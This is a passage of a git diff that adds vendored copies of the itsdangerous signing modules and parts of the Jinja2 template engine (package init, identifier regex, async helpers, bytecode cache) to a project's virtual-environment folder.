:meth:`get_signature` to provide + signature generation functionality. + """ + + def get_signature(self, key: bytes, value: bytes) -> bytes: + """Returns the signature for the given key and value.""" + raise NotImplementedError() + + def verify_signature(self, key: bytes, value: bytes, sig: bytes) -> bool: + """Verifies the given signature matches the expected + signature. + """ + return hmac.compare_digest(sig, self.get_signature(key, value)) + + +class NoneAlgorithm(SigningAlgorithm): + """Provides an algorithm that does not perform any signing and + returns an empty signature. + """ + + def get_signature(self, key: bytes, value: bytes) -> bytes: + return b"" + + +class HMACAlgorithm(SigningAlgorithm): + """Provides signature generation using HMACs.""" + + #: The digest method to use with the MAC algorithm. This defaults to + #: SHA1, but can be changed to any other function in the hashlib + #: module. + default_digest_method: _t.Any = staticmethod(hashlib.sha1) + + def __init__(self, digest_method: _t.Any = None): + if digest_method is None: + digest_method = self.default_digest_method + + self.digest_method: _t.Any = digest_method + + def get_signature(self, key: bytes, value: bytes) -> bytes: + mac = hmac.new(key, msg=value, digestmod=self.digest_method) + return mac.digest() + + +def _make_keys_list(secret_key: _t_secret_key) -> _t.List[bytes]: + if isinstance(secret_key, (str, bytes)): + return [want_bytes(secret_key)] + + return [want_bytes(s) for s in secret_key] + + +class Signer: + """A signer securely signs bytes, then unsigns them to verify that + the value hasn't been changed. + + The secret key should be a random string of ``bytes`` and should not + be saved to code or version control. Different salts should be used + to distinguish signing in different contexts. See :doc:`/concepts` + for information about the security of the secret key and salt. + + :param secret_key: The secret key to sign and verify with. Can be a + list of keys, oldest to newest, to support key rotation. + :param salt: Extra key to combine with ``secret_key`` to distinguish + signatures in different contexts. + :param sep: Separator between the signature and value. + :param key_derivation: How to derive the signing key from the secret + key and salt. Possible values are ``concat``, ``django-concat``, + or ``hmac``. Defaults to :attr:`default_key_derivation`, which + defaults to ``django-concat``. + :param digest_method: Hash function to use when generating the HMAC + signature. Defaults to :attr:`default_digest_method`, which + defaults to :func:`hashlib.sha1`. Note that the security of the + hash alone doesn't apply when used intermediately in HMAC. + :param algorithm: A :class:`SigningAlgorithm` instance to use + instead of building a default :class:`HMACAlgorithm` with the + ``digest_method``. + + .. versionchanged:: 2.0 + Added support for key rotation by passing a list to + ``secret_key``. + + .. versionchanged:: 0.18 + ``algorithm`` was added as an argument to the class constructor. + + .. versionchanged:: 0.14 + ``key_derivation`` and ``digest_method`` were added as arguments + to the class constructor. + """ + + #: The default digest method to use for the signer. The default is + #: :func:`hashlib.sha1`, but can be changed to any :mod:`hashlib` or + #: compatible object. Note that the security of the hash alone + #: doesn't apply when used intermediately in HMAC. + #: + #: .. versionadded:: 0.14 + default_digest_method: _t.Any = staticmethod(hashlib.sha1) + + #: The default scheme to use to derive the signing key from the + #: secret key and salt. The default is ``django-concat``. Possible + #: values are ``concat``, ``django-concat``, and ``hmac``. + #: + #: .. versionadded:: 0.14 + default_key_derivation: str = "django-concat" + + def __init__( + self, + secret_key: _t_secret_key, + salt: _t_opt_str_bytes = b"itsdangerous.Signer", + sep: _t_str_bytes = b".", + key_derivation: _t.Optional[str] = None, + digest_method: _t.Optional[_t.Any] = None, + algorithm: _t.Optional[SigningAlgorithm] = None, + ): + #: The list of secret keys to try for verifying signatures, from + #: oldest to newest. The newest (last) key is used for signing. + #: + #: This allows a key rotation system to keep a list of allowed + #: keys and remove expired ones. + self.secret_keys: _t.List[bytes] = _make_keys_list(secret_key) + self.sep: bytes = want_bytes(sep) + + if self.sep in _base64_alphabet: + raise ValueError( + "The given separator cannot be used because it may be" + " contained in the signature itself. ASCII letters," + " digits, and '-_=' must not be used." + ) + + if salt is not None: + salt = want_bytes(salt) + else: + salt = b"itsdangerous.Signer" + + self.salt = salt + + if key_derivation is None: + key_derivation = self.default_key_derivation + + self.key_derivation: str = key_derivation + + if digest_method is None: + digest_method = self.default_digest_method + + self.digest_method: _t.Any = digest_method + + if algorithm is None: + algorithm = HMACAlgorithm(self.digest_method) + + self.algorithm: SigningAlgorithm = algorithm + + @property + def secret_key(self) -> bytes: + """The newest (last) entry in the :attr:`secret_keys` list. This + is for compatibility from before key rotation support was added. + """ + return self.secret_keys[-1] + + def derive_key(self, secret_key: _t_opt_str_bytes = None) -> bytes: + """This method is called to derive the key. The default key + derivation choices can be overridden here. Key derivation is not + intended to be used as a security method to make a complex key + out of a short password. Instead you should use large random + secret keys. + + :param secret_key: A specific secret key to derive from. + Defaults to the last item in :attr:`secret_keys`. + + .. versionchanged:: 2.0 + Added the ``secret_key`` parameter. + """ + if secret_key is None: + secret_key = self.secret_keys[-1] + else: + secret_key = want_bytes(secret_key) + + if self.key_derivation == "concat": + return _t.cast(bytes, self.digest_method(self.salt + secret_key).digest()) + elif self.key_derivation == "django-concat": + return _t.cast( + bytes, self.digest_method(self.salt + b"signer" + secret_key).digest() + ) + elif self.key_derivation == "hmac": + mac = hmac.new(secret_key, digestmod=self.digest_method) + mac.update(self.salt) + return mac.digest() + elif self.key_derivation == "none": + return secret_key + else: + raise TypeError("Unknown key derivation method") + + def get_signature(self, value: _t_str_bytes) -> bytes: + """Returns the signature for the given value.""" + value = want_bytes(value) + key = self.derive_key() + sig = self.algorithm.get_signature(key, value) + return base64_encode(sig) + + def sign(self, value: _t_str_bytes) -> bytes: + """Signs the given string.""" + value = want_bytes(value) + return value + self.sep + self.get_signature(value) + + def verify_signature(self, value: _t_str_bytes, sig: _t_str_bytes) -> bool: + """Verifies the signature for the given value.""" + try: + sig = base64_decode(sig) + except Exception: + return False + + value = want_bytes(value) + + for secret_key in reversed(self.secret_keys): + key = self.derive_key(secret_key) + + if self.algorithm.verify_signature(key, value, sig): + return True + + return False + + def unsign(self, signed_value: _t_str_bytes) -> bytes: + """Unsigns the given string.""" + signed_value = want_bytes(signed_value) + + if self.sep not in signed_value: + raise BadSignature(f"No {self.sep!r} found in value") + + value, sig = signed_value.rsplit(self.sep, 1) + + if self.verify_signature(value, sig): + return value + + raise BadSignature(f"Signature {sig!r} does not match", payload=value) + + def validate(self, signed_value: _t_str_bytes) -> bool: + """Only validates the given signed value. Returns ``True`` if + the signature exists and is valid. + """ + try: + self.unsign(signed_value) + return True + except BadSignature: + return False diff --git a/env/Lib/site-packages/itsdangerous/timed.py b/env/Lib/site-packages/itsdangerous/timed.py new file mode 100644 index 00000000..cad8da34 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/timed.py @@ -0,0 +1,234 @@ +import time +import typing +import typing as _t +from datetime import datetime +from datetime import timezone + +from .encoding import base64_decode +from .encoding import base64_encode +from .encoding import bytes_to_int +from .encoding import int_to_bytes +from .encoding import want_bytes +from .exc import BadSignature +from .exc import BadTimeSignature +from .exc import SignatureExpired +from .serializer import Serializer +from .signer import Signer + +_t_str_bytes = _t.Union[str, bytes] +_t_opt_str_bytes = _t.Optional[_t_str_bytes] +_t_opt_int = _t.Optional[int] + +if _t.TYPE_CHECKING: + import typing_extensions as _te + + +class TimestampSigner(Signer): + """Works like the regular :class:`.Signer` but also records the time + of the signing and can be used to expire signatures. The + :meth:`unsign` method can raise :exc:`.SignatureExpired` if the + unsigning failed because the signature is expired. + """ + + def get_timestamp(self) -> int: + """Returns the current timestamp. The function must return an + integer. + """ + return int(time.time()) + + def timestamp_to_datetime(self, ts: int) -> datetime: + """Convert the timestamp from :meth:`get_timestamp` into an + aware :class`datetime.datetime` in UTC. + + .. versionchanged:: 2.0 + The timestamp is returned as a timezone-aware ``datetime`` + in UTC rather than a naive ``datetime`` assumed to be UTC. + """ + return datetime.fromtimestamp(ts, tz=timezone.utc) + + def sign(self, value: _t_str_bytes) -> bytes: + """Signs the given string and also attaches time information.""" + value = want_bytes(value) + timestamp = base64_encode(int_to_bytes(self.get_timestamp())) + sep = want_bytes(self.sep) + value = value + sep + timestamp + return value + sep + self.get_signature(value) + + # Ignore overlapping signatures check, return_timestamp is the only + # parameter that affects the return type. + + @typing.overload + def unsign( # type: ignore + self, + signed_value: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: "_te.Literal[False]" = False, + ) -> bytes: + ... + + @typing.overload + def unsign( + self, + signed_value: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: "_te.Literal[True]" = True, + ) -> _t.Tuple[bytes, datetime]: + ... + + def unsign( + self, + signed_value: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: bool = False, + ) -> _t.Union[_t.Tuple[bytes, datetime], bytes]: + """Works like the regular :meth:`.Signer.unsign` but can also + validate the time. See the base docstring of the class for + the general behavior. If ``return_timestamp`` is ``True`` the + timestamp of the signature will be returned as an aware + :class:`datetime.datetime` object in UTC. + + .. versionchanged:: 2.0 + The timestamp is returned as a timezone-aware ``datetime`` + in UTC rather than a naive ``datetime`` assumed to be UTC. + """ + try: + result = super().unsign(signed_value) + sig_error = None + except BadSignature as e: + sig_error = e + result = e.payload or b"" + + sep = want_bytes(self.sep) + + # If there is no timestamp in the result there is something + # seriously wrong. In case there was a signature error, we raise + # that one directly, otherwise we have a weird situation in + # which we shouldn't have come except someone uses a time-based + # serializer on non-timestamp data, so catch that. + if sep not in result: + if sig_error: + raise sig_error + + raise BadTimeSignature("timestamp missing", payload=result) + + value, ts_bytes = result.rsplit(sep, 1) + ts_int: _t_opt_int = None + ts_dt: _t.Optional[datetime] = None + + try: + ts_int = bytes_to_int(base64_decode(ts_bytes)) + except Exception: + pass + + # Signature is *not* okay. Raise a proper error now that we have + # split the value and the timestamp. + if sig_error is not None: + if ts_int is not None: + try: + ts_dt = self.timestamp_to_datetime(ts_int) + except (ValueError, OSError, OverflowError) as exc: + # Windows raises OSError + # 32-bit raises OverflowError + raise BadTimeSignature( + "Malformed timestamp", payload=value + ) from exc + + raise BadTimeSignature(str(sig_error), payload=value, date_signed=ts_dt) + + # Signature was okay but the timestamp is actually not there or + # malformed. Should not happen, but we handle it anyway. + if ts_int is None: + raise BadTimeSignature("Malformed timestamp", payload=value) + + # Check timestamp is not older than max_age + if max_age is not None: + age = self.get_timestamp() - ts_int + + if age > max_age: + raise SignatureExpired( + f"Signature age {age} > {max_age} seconds", + payload=value, + date_signed=self.timestamp_to_datetime(ts_int), + ) + + if age < 0: + raise SignatureExpired( + f"Signature age {age} < 0 seconds", + payload=value, + date_signed=self.timestamp_to_datetime(ts_int), + ) + + if return_timestamp: + return value, self.timestamp_to_datetime(ts_int) + + return value + + def validate(self, signed_value: _t_str_bytes, max_age: _t_opt_int = None) -> bool: + """Only validates the given signed value. Returns ``True`` if + the signature exists and is valid.""" + try: + self.unsign(signed_value, max_age=max_age) + return True + except BadSignature: + return False + + +class TimedSerializer(Serializer): + """Uses :class:`TimestampSigner` instead of the default + :class:`.Signer`. + """ + + default_signer: _t.Type[TimestampSigner] = TimestampSigner + + def iter_unsigners( + self, salt: _t_opt_str_bytes = None + ) -> _t.Iterator[TimestampSigner]: + return _t.cast("_t.Iterator[TimestampSigner]", super().iter_unsigners(salt)) + + # TODO: Signature is incompatible because parameters were added + # before salt. + + def loads( # type: ignore + self, + s: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: bool = False, + salt: _t_opt_str_bytes = None, + ) -> _t.Any: + """Reverse of :meth:`dumps`, raises :exc:`.BadSignature` if the + signature validation fails. If a ``max_age`` is provided it will + ensure the signature is not older than that time in seconds. In + case the signature is outdated, :exc:`.SignatureExpired` is + raised. All arguments are forwarded to the signer's + :meth:`~TimestampSigner.unsign` method. + """ + s = want_bytes(s) + last_exception = None + + for signer in self.iter_unsigners(salt): + try: + base64d, timestamp = signer.unsign( + s, max_age=max_age, return_timestamp=True + ) + payload = self.load_payload(base64d) + + if return_timestamp: + return payload, timestamp + + return payload + except SignatureExpired: + # The signature was unsigned successfully but was + # expired. Do not try the next signer. + raise + except BadSignature as err: + last_exception = err + + raise _t.cast(BadSignature, last_exception) + + def loads_unsafe( # type: ignore + self, + s: _t_str_bytes, + max_age: _t_opt_int = None, + salt: _t_opt_str_bytes = None, + ) -> _t.Tuple[bool, _t.Any]: + return self._loads_unsafe_impl(s, salt, load_kwargs={"max_age": max_age}) diff --git a/env/Lib/site-packages/itsdangerous/url_safe.py b/env/Lib/site-packages/itsdangerous/url_safe.py new file mode 100644 index 00000000..d5a9b0c2 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/url_safe.py @@ -0,0 +1,80 @@ +import typing as _t +import zlib + +from ._json import _CompactJSON +from .encoding import base64_decode +from .encoding import base64_encode +from .exc import BadPayload +from .serializer import Serializer +from .timed import TimedSerializer + + +class URLSafeSerializerMixin(Serializer): + """Mixed in with a regular serializer it will attempt to zlib + compress the string to make it shorter if necessary. It will also + base64 encode the string so that it can safely be placed in a URL. + """ + + default_serializer = _CompactJSON + + def load_payload( + self, + payload: bytes, + *args: _t.Any, + serializer: _t.Optional[_t.Any] = None, + **kwargs: _t.Any, + ) -> _t.Any: + decompress = False + + if payload.startswith(b"."): + payload = payload[1:] + decompress = True + + try: + json = base64_decode(payload) + except Exception as e: + raise BadPayload( + "Could not base64 decode the payload because of an exception", + original_error=e, + ) from e + + if decompress: + try: + json = zlib.decompress(json) + except Exception as e: + raise BadPayload( + "Could not zlib decompress the payload before decoding the payload", + original_error=e, + ) from e + + return super().load_payload(json, *args, **kwargs) + + def dump_payload(self, obj: _t.Any) -> bytes: + json = super().dump_payload(obj) + is_compressed = False + compressed = zlib.compress(json) + + if len(compressed) < (len(json) - 1): + json = compressed + is_compressed = True + + base64d = base64_encode(json) + + if is_compressed: + base64d = b"." + base64d + + return base64d + + +class URLSafeSerializer(URLSafeSerializerMixin, Serializer): + """Works like :class:`.Serializer` but dumps and loads into a URL + safe string consisting of the upper and lowercase character of the + alphabet as well as ``'_'``, ``'-'`` and ``'.'``. + """ + + +class URLSafeTimedSerializer(URLSafeSerializerMixin, TimedSerializer): + """Works like :class:`.TimedSerializer` but dumps and loads into a + URL safe string consisting of the upper and lowercase character of + the alphabet as well as ``'_'``, ``'-'`` and ``'.'``. + """ diff --git a/env/Lib/site-packages/jinja2/__init__.py b/env/Lib/site-packages/jinja2/__init__.py new file mode 100644 index 00000000..e3239267 --- /dev/null +++ b/env/Lib/site-packages/jinja2/__init__.py @@ -0,0 +1,37 @@ +"""Jinja is a template engine written in pure Python. It provides a +non-XML syntax that supports inline expressions and an optional +sandboxed environment. +""" +from .bccache import BytecodeCache as BytecodeCache +from .bccache import FileSystemBytecodeCache as FileSystemBytecodeCache +from .bccache import MemcachedBytecodeCache as MemcachedBytecodeCache +from .environment import Environment as Environment +from .environment import Template as Template +from .exceptions import TemplateAssertionError as TemplateAssertionError +from .exceptions import TemplateError as TemplateError +from .exceptions import TemplateNotFound as TemplateNotFound +from .exceptions import TemplateRuntimeError as TemplateRuntimeError +from .exceptions import TemplatesNotFound as TemplatesNotFound +from .exceptions import TemplateSyntaxError as TemplateSyntaxError +from .exceptions import UndefinedError as UndefinedError +from .loaders import BaseLoader as BaseLoader +from .loaders import ChoiceLoader as ChoiceLoader +from .loaders import DictLoader as DictLoader +from .loaders import FileSystemLoader as FileSystemLoader +from .loaders import FunctionLoader as FunctionLoader +from .loaders import ModuleLoader as ModuleLoader +from .loaders import PackageLoader as PackageLoader +from .loaders import PrefixLoader as PrefixLoader +from .runtime import ChainableUndefined as ChainableUndefined +from .runtime import DebugUndefined as DebugUndefined +from .runtime import make_logging_undefined as make_logging_undefined +from .runtime import StrictUndefined as StrictUndefined +from .runtime import Undefined as Undefined +from .utils import clear_caches as clear_caches +from .utils import is_undefined as is_undefined +from .utils import pass_context as pass_context +from .utils import pass_environment as pass_environment +from .utils import pass_eval_context as pass_eval_context +from .utils import select_autoescape as select_autoescape + +__version__ = "3.1.2" diff --git a/env/Lib/site-packages/jinja2/_identifier.py b/env/Lib/site-packages/jinja2/_identifier.py new file mode 100644 index 00000000..928c1503 --- /dev/null +++ b/env/Lib/site-packages/jinja2/_identifier.py @@ -0,0 +1,6 @@ +import re + +# generated by scripts/generate_identifier_pattern.py +pattern = re.compile( + r"[\w·̀-ͯ·҃-֑҇-ׇֽֿׁׂׅׄؐ-ًؚ-ٰٟۖ-ۜ۟-۪ۤۧۨ-ܑۭܰ-݊ަ-ް߫-߽߳ࠖ-࠙ࠛ-ࠣࠥ-ࠧࠩ-࡙࠭-࡛࣓-ࣣ࣡-ःऺ-़ा-ॏ॑-ॗॢॣঁ-ঃ়া-ৄেৈো-্ৗৢৣ৾ਁ-ਃ਼ਾ-ੂੇੈੋ-੍ੑੰੱੵઁ-ઃ઼ા-ૅે-ૉો-્ૢૣૺ-૿ଁ-ଃ଼ା-ୄେୈୋ-୍ୖୗୢୣஂா-ூெ-ைொ-்ௗఀ-ఄా-ౄె-ైొ-్ౕౖౢౣಁ-ಃ಼ಾ-ೄೆ-ೈೊ-್ೕೖೢೣഀ-ഃ഻഼ാ-ൄെ-ൈൊ-്ൗൢൣංඃ්ා-ුූෘ-ෟෲෳัิ-ฺ็-๎ັິ-ູົຼ່-ໍ༹༘༙༵༷༾༿ཱ-྄྆྇ྍ-ྗྙ-ྼ࿆ါ-ှၖ-ၙၞ-ၠၢ-ၤၧ-ၭၱ-ၴႂ-ႍႏႚ-ႝ፝-፟ᜒ-᜔ᜲ-᜴ᝒᝓᝲᝳ឴-៓៝᠋-᠍ᢅᢆᢩᤠ-ᤫᤰ-᤻ᨗ-ᨛᩕ-ᩞ᩠-᩿᩼᪰-᪽ᬀ-ᬄ᬴-᭄᭫-᭳ᮀ-ᮂᮡ-ᮭ᯦-᯳ᰤ-᰷᳐-᳔᳒-᳨᳭ᳲ-᳴᳷-᳹᷀-᷹᷻-᷿‿⁀⁔⃐-⃥⃜⃡-⃰℘℮⳯-⵿⳱ⷠ-〪ⷿ-゙゚〯꙯ꙴ-꙽ꚞꚟ꛰꛱ꠂ꠆ꠋꠣ-ꠧꢀꢁꢴ-ꣅ꣠-꣱ꣿꤦ-꤭ꥇ-꥓ꦀ-ꦃ꦳-꧀ꧥꨩ-ꨶꩃꩌꩍꩻ-ꩽꪰꪲ-ꪴꪷꪸꪾ꪿꫁ꫫ-ꫯꫵ꫶ꯣ-ꯪ꯬꯭ﬞ︀-️︠-︯︳︴﹍-﹏_𐇽𐋠𐍶-𐍺𐨁-𐨃𐨅𐨆𐨌-𐨏𐨸-𐨿𐨺𐫦𐫥𐴤-𐽆𐴧-𐽐𑀀-𑀂𑀸-𑁆𑁿-𑂂𑂰-𑂺𑄀-𑄂𑄧-𑄴𑅅𑅆𑅳𑆀-𑆂𑆳-𑇀𑇉-𑇌𑈬-𑈷𑈾𑋟-𑋪𑌀-𑌃𑌻𑌼𑌾-𑍄𑍇𑍈𑍋-𑍍𑍗𑍢𑍣𑍦-𑍬𑍰-𑍴𑐵-𑑆𑑞𑒰-𑓃𑖯-𑖵𑖸-𑗀𑗜𑗝𑘰-𑙀𑚫-𑚷𑜝-𑜫𑠬-𑠺𑨁-𑨊𑨳-𑨹𑨻-𑨾𑩇𑩑-𑩛𑪊-𑪙𑰯-𑰶𑰸-𑰿𑲒-𑲧𑲩-𑲶𑴱-𑴶𑴺𑴼𑴽𑴿-𑵅𑵇𑶊-𑶎𑶐𑶑𑶓-𑶗𑻳-𑻶𖫰-𖫴𖬰-𖬶𖽑-𖽾𖾏-𖾒𛲝𛲞𝅥-𝅩𝅭-𝅲𝅻-𝆂𝆅-𝆋𝆪-𝆭𝉂-𝉄𝨀-𝨶𝨻-𝩬𝩵𝪄𝪛-𝪟𝪡-𝪯𞀀-𞀆𞀈-𞀘𞀛-𞀡𞀣𞀤𞀦-𞣐𞀪-𞣖𞥄-𞥊󠄀-󠇯]+" # noqa: B950 +) diff --git a/env/Lib/site-packages/jinja2/async_utils.py b/env/Lib/site-packages/jinja2/async_utils.py new file mode 100644 index 00000000..1a4f3892 --- /dev/null +++ b/env/Lib/site-packages/jinja2/async_utils.py @@ -0,0 +1,84 @@ +import inspect +import typing as t +from functools import WRAPPER_ASSIGNMENTS +from functools import wraps + +from .utils import _PassArg +from .utils import pass_eval_context + +V = t.TypeVar("V") + + +def async_variant(normal_func): # type: ignore + def decorator(async_func): # type: ignore + pass_arg = _PassArg.from_obj(normal_func) + need_eval_context = pass_arg is None + + if pass_arg is _PassArg.environment: + + def is_async(args: t.Any) -> bool: + return t.cast(bool, args[0].is_async) + + else: + + def is_async(args: t.Any) -> bool: + return t.cast(bool, args[0].environment.is_async) + + # Take the doc and annotations from the sync function, but the + # name from the async function. Pallets-Sphinx-Themes + # build_function_directive expects __wrapped__ to point to the + # sync function. + async_func_attrs = ("__module__", "__name__", "__qualname__") + normal_func_attrs = tuple(set(WRAPPER_ASSIGNMENTS).difference(async_func_attrs)) + + @wraps(normal_func, assigned=normal_func_attrs) + @wraps(async_func, assigned=async_func_attrs, updated=()) + def wrapper(*args, **kwargs): # type: ignore + b = is_async(args) + + if need_eval_context: + args = args[1:] + + if b: + return async_func(*args, **kwargs) + + return normal_func(*args, **kwargs) + + if need_eval_context: + wrapper = pass_eval_context(wrapper) + + wrapper.jinja_async_variant = True + return wrapper + + return decorator + + +_common_primitives = {int, float, bool, str, list, dict, tuple, type(None)} + + +async def auto_await(value: t.Union[t.Awaitable["V"], "V"]) -> "V": + # Avoid a costly call to isawaitable + if type(value) in _common_primitives: + return t.cast("V", value) + + if inspect.isawaitable(value): + return await t.cast("t.Awaitable[V]", value) + + return t.cast("V", value) + + +async def auto_aiter( + iterable: "t.Union[t.AsyncIterable[V], t.Iterable[V]]", +) -> "t.AsyncIterator[V]": + if hasattr(iterable, "__aiter__"): + async for item in t.cast("t.AsyncIterable[V]", iterable): + yield item + else: + for item in t.cast("t.Iterable[V]", iterable): + yield item + + +async def auto_to_list( + value: "t.Union[t.AsyncIterable[V], t.Iterable[V]]", +) -> t.List["V"]: + return [x async for x in auto_aiter(value)] diff --git a/env/Lib/site-packages/jinja2/bccache.py b/env/Lib/site-packages/jinja2/bccache.py new file mode 100644 index 00000000..d0ddf56e --- /dev/null +++ b/env/Lib/site-packages/jinja2/bccache.py @@ -0,0 +1,406 @@ +"""The optional bytecode cache system. This is useful if you have very +complex template situations and the compilation of all those templates +slows down your application too much. + +Situations where this is useful are often forking web applications that +are initialized on the first request. +""" +import errno +import fnmatch +import marshal +import os +import pickle +import stat +import sys +import tempfile +import typing as t +from hashlib import sha1 +from io import BytesIO +from types import CodeType + +if t.TYPE_CHECKING: + import typing_extensions as te + from .environment import Environment + + class _MemcachedClient(te.Protocol): + def get(self, key: str) -> bytes: + ... + + def set(self, key: str, value: bytes, timeout: t.Optional[int] = None) -> None: + ... + + +bc_version = 5 +# Magic bytes to identify Jinja bytecode cache files. Contains the +# Python major and minor version to avoid loading incompatible bytecode +# if a project upgrades its Python version. +bc_magic = ( + b"j2" + + pickle.dumps(bc_version, 2) + + pickle.dumps((sys.version_info[0] << 24) | sys.version_info[1], 2) +) + + +class Bucket: + """Buckets are used to store the bytecode for one template. It's created + and initialized by the bytecode cache and passed to the loading functions. + + The buckets get an internal checksum from the cache assigned and use this + to automatically reject outdated cache material. Individual bytecode + cache subclasses don't have to care about cache invalidation. + """ + + def __init__(self, environment: "Environment", key: str, checksum: str) -> None: + self.environment = environment + self.key = key + self.checksum = checksum + self.reset() + + def reset(self) -> None: + """Resets the bucket (unloads the bytecode).""" + self.code: t.Optional[CodeType] = None + + def load_bytecode(self, f: t.BinaryIO) -> None: + """Loads bytecode from a file or file like object.""" + # make sure the magic header is correct + magic = f.read(len(bc_magic)) + if magic != bc_magic: + self.reset() + return + # the source code of the file changed, we need to reload + checksum = pickle.load(f) + if self.checksum != checksum: + self.reset() + return + # if marshal_load fails then we need to reload + try: + self.code = marshal.load(f) + except (EOFError, ValueError, TypeError): + self.reset() + return + + def write_bytecode(self, f: t.IO[bytes]) -> None: + """Dump the bytecode into the file or file like object passed.""" + if self.code is None: + raise TypeError("can't write empty bucket") + f.write(bc_magic) + pickle.dump(self.checksum, f, 2) + marshal.dump(self.code, f) + + def bytecode_from_string(self, string: bytes) -> None: + """Load bytecode from bytes.""" + self.load_bytecode(BytesIO(string)) + + def bytecode_to_string(self) -> bytes: + """Return the bytecode as bytes.""" + out = BytesIO() + self.write_bytecode(out) + return out.getvalue() + + +class BytecodeCache: + """To implement your own bytecode cache you have to subclass this class + and override :meth:`load_bytecode` and :meth:`dump_bytecode`. Both of + these methods are passed a :class:`~jinja2.bccache.Bucket`. + + A very basic bytecode cache that saves the bytecode on the file system:: + + from os import path + + class MyCache(BytecodeCache): + + def __init__(self, directory): + self.directory = directory + + def load_bytecode(self, bucket): + filename = path.join(self.directory, bucket.key) + if path.exists(filename): + with open(filename, 'rb') as f: + bucket.load_bytecode(f) + + def dump_bytecode(self, bucket): + filename = path.join(self.directory, bucket.key) + with open(filename, 'wb') as f: + bucket.write_bytecode(f) + + A more advanced version of a filesystem based bytecode cache is part of + Jinja. + """ + + def load_bytecode(self, bucket: Bucket) -> None: + """Subclasses have to override this method to load bytecode into a + bucket. If they are not able to find code in the cache for the + bucket, it must not do anything. + """ + raise NotImplementedError() + + def dump_bytecode(self, bucket: Bucket) -> None: + """Subclasses have to override this method to write the bytecode + from a bucket back to the cache. If it unable to do so it must not + fail silently but raise an exception. + """ + raise NotImplementedError() + + def clear(self) -> None: + """Clears the cache. This method is not used by Jinja but should be + implemented to allow applications to clear the bytecode cache used + by a particular environment. + """ + + def get_cache_key( + self, name: str, filename: t.Optional[t.Union[str]] = None + ) -> str: + """Returns the unique hash key for this template name.""" + hash = sha1(name.encode("utf-8")) + + if filename is not None: + hash.update(f"|{filename}".encode()) + + return hash.hexdigest() + + def get_source_checksum(self, source: str) -> str: + """Returns a checksum for the source.""" + return sha1(source.encode("utf-8")).hexdigest() + + def get_bucket( + self, + environment: "Environment", + name: str, + filename: t.Optional[str], + source: str, + ) -> Bucket: + """Return a cache bucket for the given template. All arguments are + mandatory but filename may be `None`. + """ + key = self.get_cache_key(name, filename) + checksum = self.get_source_checksum(source) + bucket = Bucket(environment, key, checksum) + self.load_bytecode(bucket) + return bucket + + def set_bucket(self, bucket: Bucket) -> None: + """Put the bucket into the cache.""" + self.dump_bytecode(bucket) + + +class FileSystemBytecodeCache(BytecodeCache): + """A bytecode cache that stores bytecode on the filesystem. It accepts + two arguments: The directory where the cache items are stored and a + pattern string that is used to build the filename. + + If no directory is specified a default cache directory is selected. On + Windows the user's temp directory is used, on UNIX systems a directory + is created for the user in the system temp directory. + + The pattern can be used to have multiple separate caches operate on the + same directory. The default pattern is ``'__jinja2_%s.cache'``. ``%s`` + is replaced with the cache key. + + >>> bcc = FileSystemBytecodeCache('/tmp/jinja_cache', '%s.cache') + + This bytecode cache supports clearing of the cache using the clear method. + """ + + def __init__( + self, directory: t.Optional[str] = None, pattern: str = "__jinja2_%s.cache" + ) -> None: + if directory is None: + directory = self._get_default_cache_dir() + self.directory = directory + self.pattern = pattern + + def _get_default_cache_dir(self) -> str: + def _unsafe_dir() -> "te.NoReturn": + raise RuntimeError( + "Cannot determine safe temp directory. You " + "need to explicitly provide one." + ) + + tmpdir = tempfile.gettempdir() + + # On windows the temporary directory is used specific unless + # explicitly forced otherwise. We can just use that. + if os.name == "nt": + return tmpdir + if not hasattr(os, "getuid"): + _unsafe_dir() + + dirname = f"_jinja2-cache-{os.getuid()}" + actual_dir = os.path.join(tmpdir, dirname) + + try: + os.mkdir(actual_dir, stat.S_IRWXU) + except OSError as e: + if e.errno != errno.EEXIST: + raise + try: + os.chmod(actual_dir, stat.S_IRWXU) + actual_dir_stat = os.lstat(actual_dir) + if ( + actual_dir_stat.st_uid != os.getuid() + or not stat.S_ISDIR(actual_dir_stat.st_mode) + or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU + ): + _unsafe_dir() + except OSError as e: + if e.errno != errno.EEXIST: + raise + + actual_dir_stat = os.lstat(actual_dir) + if ( + actual_dir_stat.st_uid != os.getuid() + or not stat.S_ISDIR(actual_dir_stat.st_mode) + or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU + ): + _unsafe_dir() + + return actual_dir + + def _get_cache_filename(self, bucket: Bucket) -> str: + return os.path.join(self.directory, self.pattern % (bucket.key,)) + + def load_bytecode(self, bucket: Bucket) -> None: + filename = self._get_cache_filename(bucket) + + # Don't test for existence before opening the file, since the + # file could disappear after the test before the open. + try: + f = open(filename, "rb") + except (FileNotFoundError, IsADirectoryError, PermissionError): + # PermissionError can occur on Windows when an operation is + # in progress, such as calling clear(). + return + + with f: + bucket.load_bytecode(f) + + def dump_bytecode(self, bucket: Bucket) -> None: + # Write to a temporary file, then rename to the real name after + # writing. This avoids another process reading the file before + # it is fully written. + name = self._get_cache_filename(bucket) + f = tempfile.NamedTemporaryFile( + mode="wb", + dir=os.path.dirname(name), + prefix=os.path.basename(name), + suffix=".tmp", + delete=False, + ) + + def remove_silent() -> None: + try: + os.remove(f.name) + except OSError: + # Another process may have called clear(). On Windows, + # another program may be holding the file open. + pass + + try: + with f: + bucket.write_bytecode(f) + except BaseException: + remove_silent() + raise + + try: + os.replace(f.name, name) + except OSError: + # Another process may have called clear(). On Windows, + # another program may be holding the file open. + remove_silent() + except BaseException: + remove_silent() + raise + + def clear(self) -> None: + # imported lazily here because google app-engine doesn't support + # write access on the file system and the function does not exist + # normally. + from os import remove + + files = fnmatch.filter(os.listdir(self.directory), self.pattern % ("*",)) + for filename in files: + try: + remove(os.path.join(self.directory, filename)) + except OSError: + pass + + +class MemcachedBytecodeCache(BytecodeCache): + """This class implements a bytecode cache that uses a memcache cache for + storing the information. It does not enforce a specific memcache library + (tummy's memcache or cmemcache) but will accept any class that provides + the minimal interface required. + + Libraries compatible with this class: + + - `cachelib `_ + - `python-memcached `_ + + (Unfortunately the django cache interface is not compatible because it + does not support storing binary data, only text. You can however pass + the underlying cache client to the bytecode cache which is available + as `django.core.cache.cache._client`.) + + 